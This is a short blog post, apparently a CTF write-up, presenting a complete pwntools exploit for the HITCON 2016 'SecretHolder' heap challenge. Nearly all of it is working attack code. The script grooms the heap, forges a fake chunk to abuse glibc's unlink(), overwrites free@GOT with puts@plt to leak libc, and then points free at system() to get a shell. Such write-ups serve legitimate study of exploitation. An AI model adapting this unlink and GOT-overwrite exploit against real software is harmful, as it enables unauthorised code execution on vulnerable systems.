cdor1's lab

Security/Pwnable

HITCON 2016 SecretHolder

Cdor1 2016. 12. 1. 03:38

Review: a problem I am grateful for, since it made me understand the concept of unsafe_unlink and the importance of debugging.

I would like to try solving another problem that attacks by building a fake_chunk.


from __future__ import print_function
from pwn import *

s = remote('localhost', 4000)
elf = ELF('/home/cdor1/pwnable/SecretHolder')
libc = ELF('/home/cdor1/pwnable/libc.so.6_cdor1')

free_got = elf.got['free']
puts_plt = elf.plt['puts']

# Menu wrappers. The binary offers 1 = Keep, 2 = Wipe, 3 = Renew; the second
# prompt selects the secret: 1 = small, 2 = big, 3 = huge.
def keep(num, data):
    print(s.recvuntil('3. Renew secret'))
    s.sendline('1')
    print(s.recvuntil('3. Huge secret'))
    s.sendline(str(num))
    print(s.recvline())
    s.sendline(data)

def wipe(num):
    print(s.recvuntil('3. Renew secret'))
    s.sendline('2')
    print(s.recvuntil('3. Huge secret'))
    s.sendline(str(num))

def renew(num, data):
    print(s.recvuntil('3. Renew secret'))
    s.sendline('3')
    print(s.recvuntil('3. Huge secret'))
    s.sendline(str(num))
    print(s.recvline())
    s.send(data)

# Heap grooming: allocate and free all three secrets, then re-allocate in an
# order that leaves the huge secret's buffer overlapping the chunks handed out
# as the small and big secrets. Writing through secret 3 can then forge the
# chunk headers that the other two secrets sit on.
keep(1, 'AAAA')
keep(2, 'BBBB')
keep(3, 'CCCC')

wipe(1)
wipe(2)
wipe(3)

keep(3, 'CCCC')
wipe(1)
keep(1, 'AAAA')
keep(2, 'BBBB')

# Fake chunk at the start of secret 3's buffer. The global slot at 0x6020a8
# holds that buffer's address, so fd = slot - 24 and bk = slot - 16 satisfy
# glibc's FD->bk == P && BK->fd == P safe-unlinking check.
payload = p64(0x0)               # prev_size
payload += p64(0x21)             # size 0x20 | PREV_INUSE
payload += p64(0x6020a8 - 24)    # fd
payload += p64(0x6020a8 - 16)    # bk

# Header of the chunk that follows (secret 2): prev_size equals the fake
# chunk's size and PREV_INUSE is clear, so freeing it consolidates backwards
# and calls unlink() on the fake chunk.
payload += p64(0x20)
payload += p64(0x90)
payload += b'A' * 0x80

# Keep the chunks after it looking sane for free()'s sanity checks.
payload += p64(0x90)
payload += p64(0x91)
payload += b'B' * 0x80

payload += p64(0x90)
payload += p64(0x21)

renew(3, payload)
pause()   # attach a debugger here to watch the unlink happen
# unlink() performs FD->bk = BK and then BK->fd = FD; both writes land on the
# slot at 0x6020a8, which afterwards contains 0x6020a8 - 24.
wipe(2)

# Secret 3 now "starts" 24 bytes before its own pointer slot, so writing
# through it overwrites the slot itself and redirects secret 3 to free@got - 16.
payload = p64(0) * 3
payload += p64(free_got - 16)
renew(3, payload)

# Secret 3 aliases the GOT: point free@got at puts@plt so free(p) prints *p.
payload = p64(0) * 2
payload += p64(puts_plt)
renew(3, payload)

# Store the command in the small secret; wipe(1) now calls puts() on it, which
# prints the string followed by whatever lies after it in the chunk.
sh = b'/bin/sh;'
sh += b'A' * 8
renew(1, sh)

wipe(1)

print(s.recvuntil(sh))
leak = u64(s.recv(6).ljust(8, b'\x00'))   # main_arena pointer left in the chunk

# Offsets below are for the libc shipped with the challenge.
libc_base = leak - 0x3BE7B8
system_libc = libc_base + 0x46590

print('[*] main_arena : ' + hex(leak))
print('[*] libc_base : ' + hex(libc_base))
print('[*] libc_system : ' + hex(system_libc))

# Replace free@got with system(); wipe(1) now runs system("/bin/sh;AAAAAAAA").
payload = p64(0) * 2
payload += p64(system_libc)
renew(3, payload)

wipe(1)

s.interactive()
